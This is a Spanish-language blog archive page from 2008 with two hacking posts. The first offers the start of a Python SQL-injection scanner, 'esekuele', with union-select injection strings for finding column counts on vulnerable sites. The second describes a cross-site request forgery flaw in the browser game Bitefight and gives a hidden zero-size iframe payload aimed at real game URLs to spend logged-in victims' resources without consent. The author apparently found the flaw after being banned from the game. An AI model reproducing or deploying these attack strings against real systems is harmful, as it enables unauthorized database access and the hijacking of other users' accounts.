Ir al contenido principal

Entradas

Mostrando entradas de octubre, 2008

Esekuele v 0.1

Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena: The used SELECT statements have a different number of columns y de ahi sacar el numero de columnas. ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo y tambien si tienen ideas son aceptadas para ver que mas le podemos poner :-D aqui les dejo el code: import urllib2 import string uno = "-1/**/union/**/select/**/" dos = "-1+union+select+/" print '\n |-----------------------------------------------------------|' print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|' print '\n |-------------------| esekuele.py |-------------------------|' print '\n |-----------------------------------------------------------|' print '\n |Uso: \n I

Bitefight Vulnerabilidad XSRF Bitefight Vulnerabilidad XSRF

Bueno hace algun tiempo (poco en realidad xD ) jugaba bitefight jejejej y por cuestiones ajenas a mi xD me bannearon la cuenta, estuve viendo y bitefight es vulnerable a XSRF lo investigue con algo sencillo, al ver que no pedia confirmacion alguna al momento de hacer un cambio en la cuenta trate con comprar fuerza registrandome con otra cuenta, algo asi: al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto: < width="0px" src=" http://s7.bitefight.com.mx/bite/training.php?b=1 " height="0px" align="center">< /iframe > esa parte es para comprar fuerza, se agrega en una pagina y al momento que el usuario entra a la web maliciosa, automaticamente (si esta logueado en bitefight claro defensa: http://s7.bitefight.com.mx/bite/training.php?b=2 destreza